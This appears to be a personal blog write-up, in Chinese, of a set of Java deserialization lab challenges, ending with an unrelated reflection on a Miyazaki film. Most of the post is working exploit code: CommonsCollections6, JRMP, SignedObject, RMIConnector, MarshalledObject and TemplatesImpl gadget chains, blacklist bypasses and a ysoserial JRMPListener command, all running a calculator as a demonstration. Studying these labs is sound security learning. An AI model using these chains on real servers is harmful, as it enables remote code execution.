2024-03-17

java反序列化实题目

lab1-basic：

import java.io.ObjectInputStream;
import java.io.Serializable;

public class Calc implements Serializable {
    private boolean canPopCalc = false;
    private String cmd = "ls -al";

    public Calc() {
    }

    private void readObject(ObjectInputStream objectInputStream) throws Exception {
        objectInputStream.defaultReadObject();
        if (this.canPopCalc) {
            Runtime.getRuntime().exec(this.cmd);
        }

    }
}

很简单反射一下修改属性即可，这里本地进行序列化和反序列化来测试场景

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class demo {
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }

    public static void main(String[] args) throws Exception {
        Calc calc = new Calc();
        setFieldValue(calc,"canPopCalc",true);
        setFieldValue(calc,"cmd","calc");


        try {
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("payload.bin"));
            outputStream.writeObject(calc);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("payload.bin"));
            inputStream.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}

lab2-ysoserial：

import com.yxxx.javasec.deserialize.Utils;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;

@Controller
public class IndexController {
    @RequestMapping(value={"/basic"})
    public String greeting(@RequestParam(name="data", required=true) String data, Model model) throws Exception {
        byte[] b = Utils.hexStringToBytes(data);
        ByteArrayInputStream inputStream = new ByteArrayInputStream(b);
        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        String name = objectInputStream.readUTF();
        int year = objectInputStream.readInt();
        if (!name.equals("SJTU")) return "index";
        if (year != 1896) return "index";
        objectInputStream.readObject();
        return "index";
    }
}

pom.xml中存在cc3.2.1的依赖，加上题目提示，不难想到要利用ysoserial并且需要在序列化里面设置1896和SJTU

使用cc6

Jdk 8u71
Comoons-Collections 3.2.1

public class cc6 {

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {

        Transformer[] fakeTransformer = new Transformer[]{};

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        //ChainedTransformer实例
        //先设置假的 Transformer 数组，防止生成时执行命令
        Transformer chainedTransformer = new ChainedTransformer(fakeTransformer);

        //LazyMap实例
        Map uselessMap = new HashMap();
        Map lazyMap = LazyMap.decorate(uselessMap, chainedTransformer);

        //TiedMapEntry 实例
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "test");

        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "test");


        //通过反射设置真的 ransformer 数组
        Field field = chainedTransformer.getClass().getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chainedTransformer, transformers);
        //清空由于 hashMap.put 对 LazyMap 造成的影响
        lazyMap.clear();

        //序列化
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeUTF("SJTU");
        oos.writeInt(1896);
        oos.writeObject(hashMap);
        oos.flush();
        oos.close();
        System.out.println(Utils.bytesTohexString(barr.toByteArray()));
        
        //测试反序列化
//        ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
//        ObjectInputStream ois = new ObjectInputStream(bais);
//        ois.readObject();
//        ois.close();

    }

}

lab3-shiro-jrmp

第三题多了MyObjectInputStream，其使用了classLoader.loadClass()而非默认的Class.forName()去加载类

import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.net.URL;
import java.net.URLClassLoader;
import org.apache.commons.collections.Transformer;

public class MyObjectInputStream extends ObjectInputStream {
    private ClassLoader classLoader;

    public MyObjectInputStream(InputStream inputStream) throws Exception {
        super(inputStream);
        URL[] urls = ((URLClassLoader)Transformer.class.getClassLoader()).getURLs();
        this.classLoader = new URLClassLoader(urls);
    }

    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        Class clazz = this.classLoader.loadClass(desc.getName());
        return clazz;
    }
}

两者主要的不同点在于不能够加载数组，比如:

1 2	Class.forName("[[B"); // class [[B ClassLoader.getSystemClassLoader().loadClass("[[B"); // ClassNotFoundException

就涉及到二次反序列化具体可以看这里或者这里

JRMP简介

就是让服务端反序列化一个JRMPClient，向我们恶意的Registry发送请求，触发二次反序列化，其主要意义是绕过黑名单的限制或不出网利用 ,这也算是用上了rmi的基础

payload：

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;

public class demo {
    public static void main(String[] args) throws Exception {
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint("127.0.0.1", 3333);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
        Registry proxy = (Registry) Proxy.newProxyInstance(demo.class.getClassLoader(), new Class[]{Registry.class}, obj);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeUTF("SJTU");
        oos.writeInt(1896);
        oos.writeObject(proxy);
        oos.close();
//用这个获得一个请求然后再用 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 3333 CommonsCollections6 "calc"
//        System.out.println(Utils.bytesTohexString(barr.toByteArray()));
    }
}

创建了一个远程对象Registry的代理

看了yso,只是看了，没调，配置项目又要报错，而且不是特别新的只是了，只是来学一下基础

lab4-shiro-blindjava

题目一样但是设置了不出网

version: '2.4'
services:
  nginx:
    image: nginx:1.15
    ports:
      - "0.0.0.0:40061:80"
    restart: always
    volumes:
        - ./default.conf:/etc/nginx/conf.d/default.conf:ro
    networks:
      - internal_network
      - out_network
  web:
    build: ./
    restart: always
    networks:
      - internal_network
networks:
    internal_network:
        internal: true
        ipam:
            driver: default
    out_network:
        driver_opts:
            com.docker.network.driver.mtu: 1400
        ipam:
            driver: default

用二次反序列化绕过java

java.security.SignedObject 的构造方法中存在序列化操作，并将字节数组存储到content中， SignedObject#getObject下也完美的实现了将上面赋值的content反序列化操作

KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
kpg.initialize(1024);
KeyPair kp = kpg.generateKeyPair();
SignedObject signedObject = new SignedObject(恶意对象 用于第二次反序列化, kp.getPrivate(), Signature.getInstance("DSA"));

然后调用它的getObject()方法，触发readobject

例如：

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.security.*;
import java.util.HashMap;
import java.util.Map;

public class cc6_JMXServiceURL {

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException, NoSuchAlgorithmException, SignatureException, InvalidKeyException {

        Transformer[] fakeTransformer = new Transformer[]{};

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        //ChainedTransformer实例
        //先设置假的 Transformer 数组，防止生成时执行命令
        Transformer chainedTransformer = new ChainedTransformer(fakeTransformer);

        //LazyMap实例
        Map uselessMap = new HashMap();
        Map lazyMap = LazyMap.decorate(uselessMap, chainedTransformer);

        //TiedMapEntry 实例
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "test");

        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "test");


        //通过反射设置真的 ransformer 数组
        Field field = chainedTransformer.getClass().getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chainedTransformer, transformers);
        //清空由于 hashMap.put 对 LazyMap 造成的影响
        lazyMap.clear();

        //序列化
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeUTF("SJTU");
        oos.writeInt(1896);
        oos.writeObject(hashMap);
        oos.flush();
        oos.close();

//        String payload=Utils.bytesTohexString(baos.toByteArray());
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
        kpg.initialize(1024);
        KeyPair kp = kpg.generateKeyPair();
        SignedObject signedObject = new SignedObject(hashMap , kp.getPrivate(), Signature.getInstance("DSA"));
        signedObject.getObject();
//        测试反序列化
//        ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
//        ObjectInputStream ois = new ObjectInputStream(bais);
//        ois.readObject();
//        ois.close();

    }

}

就是代替了原本我自己模仿服务器写的readobject,找不到谁调用getObject，所以找调用getter的，我想到了fastjson，但是这题没有这个依赖，就想到了用cc的一个transform触发 getreadobject

package CC;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.security.*;
import java.util.HashMap;
import java.util.Map;

public class cc6_SignedObject {
    public static Object getcc_6object(String cmd) throws IOException, NoSuchFieldException, IllegalAccessException {
        Transformer[] fakeTransformers = new Transformer[]{new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{cmd}),
                new ConstantTransformer(1),
        };
        // 先使用fakeTransformer防止本地命令执行
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "keykey");

        Map objMap = new HashMap();
        objMap.put(tiedMapEntry, "valuevalue");
        outerMap.clear();

        // 使用反射替换transformerChain的transformers
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(objMap);

//        return Base64.getEncoder().encodeToString(barr.toByteArray());
        return objMap;
    }

    public  static Object getpayload_Object() throws Exception {
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
        keyPairGenerator.initialize(1024);
        KeyPair keyPair = keyPairGenerator.genKeyPair();
        PrivateKey privateKey = keyPair.getPrivate();
        Signature signature = Signature.getInstance(privateKey.getAlgorithm());
        SignedObject signedObject = new SignedObject((Serializable) getcc_6object("calc"), privateKey, signature);
        Transformer invokerTransformer = new InvokerTransformer("getClass", null, null);
        java.util.Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, invokerTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, signedObject);

        HashMap expMap = new HashMap();
        expMap.put(tiedMapEntry, "value");
        outerMap.clear();
        setFieldValue(invokerTransformer, "iMethodName", "getObject");

        return expMap;
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeUTF("SJTU");
        oos.writeInt(1896);
        oos.writeObject(getpayload_Object());
        oos.close();
        System.out.println(Utils.bytesTohexString(barr.toByteArray()));
        //测试反序列化
//        ByteArrayInputStream bais = new ByteArrayInputStream(barr.toByteArray());
//        ObjectInputStream ois = new ObjectInputStream(bais);
//        ois.readObject();
//        ois.close();


    }
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}
java

但是getobject不太行，payload没问题lab2可以打通

网上二次反序列化用的是findRMIServerJRMP

这里还会把base64转回array，所以cc6部分要转成base64

看到这里有个猜想，是不是因为这个传输过程中转为base64了所以才算真正绕过‘不能够加载数组’的限制

触发点是RMIConnector.connect,思路和刚才一样，transform来触发connect就可以

贴一下别人写的payload:

package CC;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class cc6_JMXServiceURL {
    public static String getCC6Payload(String cmd) throws Exception {
        Transformer[] fakeTransformers = new Transformer[]{new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{cmd}),
                new ConstantTransformer(1),
        };

        // 先使用fakeTransformer防止本地命令执行
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "keykey");

        Map objMap = new HashMap();
        objMap.put(tiedMapEntry, "valuevalue");
        outerMap.clear();

        // 使用反射替换transformerChain的transformers
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(objMap);

        return Base64.getEncoder().encodeToString(barr.toByteArray());
    }

    public static Object getPayload(String cmd) throws Exception {


        RMIConnector connector = new RMIConnector(new JMXServiceURL("service:jmx:iiop://127.0.0.1:8000/stub/{$payload}".replace("{$payload}", getCC6Payload(cmd))), null);
        Transformer invokerTransformer = new InvokerTransformer("getClass", null, null);
        java.util.Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, invokerTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, connector);

        HashMap expMap = new HashMap();
        expMap.put(tiedMapEntry, "value");
        outerMap.clear();
        setFieldValue(invokerTransformer, "iMethodName", "connect");

        return expMap;
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeUTF("SJTU");
        oos.writeInt(1896);
        oos.writeObject(getPayload("calc"));
        oos.close();
        System.out.println(Utils.bytesTohexString(barr.toByteArray()));



    }
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}

lab5-weblogic-readResolvejava

增加了黑名单

那我们就用不了transform方法了。。。然后就没思路了

答案是用了题目给的 MarshalledObject 进行二次序列化，

不知道为什么我写的就是打不通

后来写到九明白了，MarshalledObject应该设置为和原题一样的包名，得自己建一个

1	com.yxxx.javasec

不然会找不到对应类

改正后：

package com.yxxx.javasec;//这里

import com.yxxx.javasec.deserialize.MarshalledObject;//这里
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

import static CC.Utils.bytesTohexString;

public class demo5 {
    public  static Object getcc_6() throws IOException, IllegalAccessException, NoSuchFieldException {
        Transformer[] fakeTransformer = new Transformer[]{};

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        //ChainedTransformer实例
        //先设置假的 Transformer 数组，防止生成时执行命令
        Transformer chainedTransformer = new ChainedTransformer(fakeTransformer);

        //LazyMap实例
        Map uselessMap = new HashMap();
        Map lazyMap = LazyMap.decorate(uselessMap, chainedTransformer);

        //TiedMapEntry 实例
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "test");

        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "test");

        //通过反射设置真的 ransformer 数组
        Field field = chainedTransformer.getClass().getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chainedTransformer, transformers);
        //清空由于 hashMap.put 对 LazyMap 造成的影响
        lazyMap.clear();

        //序列化
//        ByteArrayOutputStream baos = new ByteArrayOutputStream();
//        ObjectOutputStream oos = new ObjectOutputStream(baos);
//        oos.writeUTF("SJTU");
//        oos.writeInt(1896);
//        oos.writeObject(hashMap);
//        oos.flush();
//        oos.close();
//        System.out.println(CC.Utils.bytesTohexString(baos.toByteArray()));
        return hashMap;
    }

    public  static void main(String[] args) throws Exception {
        MarshalledObject marshalledObject=new MarshalledObject();

        ByteArrayOutputStream tser = new ByteArrayOutputStream();
        ObjectOutputStream toser = new ObjectOutputStream(tser);
        toser.writeObject(getcc_6());
        toser.close();

        setFieldValue(marshalledObject,"bytes",tser.toByteArray());

        ByteArrayOutputStream ser = new ByteArrayOutputStream();
        ObjectOutputStream oser = new ObjectOutputStream(ser);
        oser.writeUTF("SJTU");
        oser.writeInt(1896);
        oser.writeObject(marshalledObject);
        oser.close();
//        marshalledObject.readResolve();
        System.out.println(bytesTohexString(ser.toByteArray()));
    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}

lab6-weblogic-resolveProxyClass

题目和lab3相似但是限制了动态代理

public class MyObjectInputStream extends ObjectInputStream {
    private static ArrayList<String> classBlackList = new ArrayList();
    private static ArrayList<String> proxyBlackList = new ArrayList();

    public MyObjectInputStream(InputStream inputStream) throws Exception {
        super(inputStream);
    }

    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        Iterator var2 = classBlackList.iterator();

        String s;
        do {
            if (!var2.hasNext()) {
                return super.resolveClass(desc);
            }

            s = (String)var2.next();
        } while(!desc.getName().contains(s));

        throw new ClassNotFoundException("go out!");
    }

    protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
        Iterator var2 = proxyBlackList.iterator();

        while(var2.hasNext()) {
            String s = (String)var2.next();
            String[] var4 = interfaces;
            int var5 = interfaces.length;

            for(int var6 = 0; var6 < var5; ++var6) {
                String anInterface = var4[var6];
                if (anInterface.contains(s)) {
                    throw new ClassNotFoundException("go out!");
                }
            }
        }

        return super.resolveProxyClass(interfaces);
    }

    static {
        classBlackList.add("org.apache.commons.collections.functors");
        proxyBlackList.add("java.rmi.registry");
    }
}

payload.JRMPClient不需要动态代理一样可以进行攻击，代码如下所示java

Proxy类其中的InvocationHandler对象是RemoteObjectInvocationHandler，而默认反序列化Proxy就会去反序列化其中的InvocationHandler字段，也就是反序列化RemoteObjectInvocationHandler字段，然后同样会走到触发攻击的地方

payload出自：https://ameuu.github.io/2022/07/22/JavaDeserializeLabs/

package serializable.exp6;

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Proxy;
import java.rmi.activation.ActivationInstantiator;
import java.rmi.activation.ActivationMonitor;
import java.rmi.activation.ActivationSystem;
import java.rmi.activation.Activator;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;

public class JrmpListener {
    public static void main(String[] args) throws Exception{
        ObjID objID = new ObjID(new Random().nextInt()); // 对象标识符
        TCPEndpoint tcpEndpoint = new TCPEndpoint("127.0.0.1",3333); // 与远程的RMI服务连接
        UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false)); // \\
        RemoteObjectInvocationHandler rih = new RemoteObjectInvocationHandler(unicastRef);
        ActivationInstantiator registry = (ActivationInstantiator) Proxy.newProxyInstance(JrmpListener.class.getClassLoader(), new Class[]{ActivationInstantiator.class}, rih); // 通过反射

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream os = new ObjectOutputStream(bos);
        os.writeUTF("SJTU");
        os.writeInt(1896);
        os.writeObject(registry);
        os.close();

        System.out.println(Utils.bytesTohexString(bos.toByteArray()));

        // for test
//        ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
//        ObjectInputStream ois = new ObjectInputStream(bis);
//        ois.readObject();
    }
}

//java -cp ysoserial.jar ysoserial.exploit.JRMPListener 3333 CommonsCollections6 "calc"

lab7-weblogic-UnicastRef

相比lab6,增加了黑名单：

static {
    classBlackList.add("org.apache.commons.collections.functors");
    classBlackList.add("sun.rmi.server.UnicastRef");
    classBlackList.add("java.rmi.server.RemoteObjectInvocationHandler");
    proxyBlackList.add("java.rmi.registry");
}

并且Dockerfile 中，对javax.management.BadAttributeValueExpException 进行了序列化过滤

之前的payload需要利用RemoteObjectInvocationHandler，进行远程连接

lab8里面是lab6

lab9-proxy

题目自己写了一个 MyInvocationHandler：

public class MyInvocationHandler implements InvocationHandler, Serializable {
    private Class type;

    public MyInvocationHandler() {
    }

    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        Method[] methods = this.type.getDeclaredMethods();
        Method[] var5 = methods;
        int var6 = methods.length;

        for(int var7 = 0; var7 < var6; ++var7) {
            Method xmethod = var5[var7];
            xmethod.invoke(args[0]);
        }

        return null;
    }
}

没有 commons-collection3.2.1 依赖了,想到cc2利用TemplatesImpl，但是cc2里的comparator，需要commons-collection3.2.1 依赖，利用给的MyInvocationHandler，进行绕过

payload:

package serializable.exp9;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;

import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.util.Comparator;
import java.util.PriorityQueue;

public class apply {
    public static void main(String[] args) throws Exception {
        //相当于写了一个static Evil{}
        ClassPool classPool = ClassPool.getDefault();
        classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass evilclass = classPool.makeClass("Evil");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"%s\");";
        cmd = String.format(cmd, "calc.exe");
        evilclass.makeClassInitializer().insertBefore(cmd);
        String newname = "Evil" + System.nanoTime();
        evilclass.setName(newname);
        evilclass.setSuperclass(classPool.get(AbstractTranslet.class.getName()));
        byte[] evilclassbytes = evilclass.toBytecode();
        byte[][] targetbytes = new byte[][]{evilclassbytes};

        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetbytes);
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);

        PriorityQueue priorityQueue = new PriorityQueue(1);
        MyInvocationHandler handler = new MyInvocationHandler();
        setFieldValue(handler, "type", Templates.class);
        Comparator comparator = (Comparator) Proxy.newProxyInstance(apply.class.getClassLoader(), new Class[]{Comparator.class}, handler);


        //PriorityQueue和TemplatesImpl的连接
        Object[] queuearray = {templates, 1};
        setFieldValue(priorityQueue, "queue", queuearray);
        setFieldValue(priorityQueue, "size", 2);
        setFieldValue(priorityQueue, "comparator", comparator);
        
        try {
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("payload.bin"));
            outputStream.writeObject(priorityQueue);
            outputStream.close();
        System.out.println(objectToHexString(priorityQueue));
//            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("payload.bin"));
//            inputStream.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
    public static String objectToHexString(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bos);
        out.writeObject(obj);
        out.flush();
        byte[] bytes = bos.toByteArray();
        bos.close();
        String hex = bytesTohexString(bytes);
        return hex;
    }

    public static String bytesTohexString(byte[] bytes) {
        if (bytes == null) {
            return null;
        }
        StringBuilder ret = new StringBuilder(2 * bytes.length);
        for (int i = 0; i < bytes.length; i++) {
            int b = 15 & (bytes[i] >> 4);
            ret.append("0123456789abcdef".charAt(b));
            int b2 = 15 & bytes[i];
            ret.append("0123456789abcdef".charAt(b2));
        }
        return ret.toString();
    }
}

要在new priorityQueue() 之后再用 MyInvocationHandler 配合 proxy写一个 comparator

看了宫崎骏的电影《你想成为怎么样的人》（我没带如日本的背景，而是赋予他我认为的意义）

主角真一进入了一个异世界，开始了寻找夏子的路，最后回到了现实世界，舅公想把搭建世界的石头传给真一，因为真一懂石头是罪恶的，（石子最开始是纯洁的，可是粘上了利益就不再纯洁了）可真一拒绝了，说“我也有罪恶”，（我也会这么选的，比起令人敬仰的权利，我更喜欢自由的风，和被温暖又挚烈的阳光簇拥）

真一从片头开始就是心思很重的感觉，因为他失去了母亲，对夏子“后妈”一直保持距离，不排斥可是也不接受，后来真一在异世界的产房里理解了夏子，最后接受了夏子，我认为这也是接受了现实

总结：我想成为怎么样的人？

有自己的生活，享受自由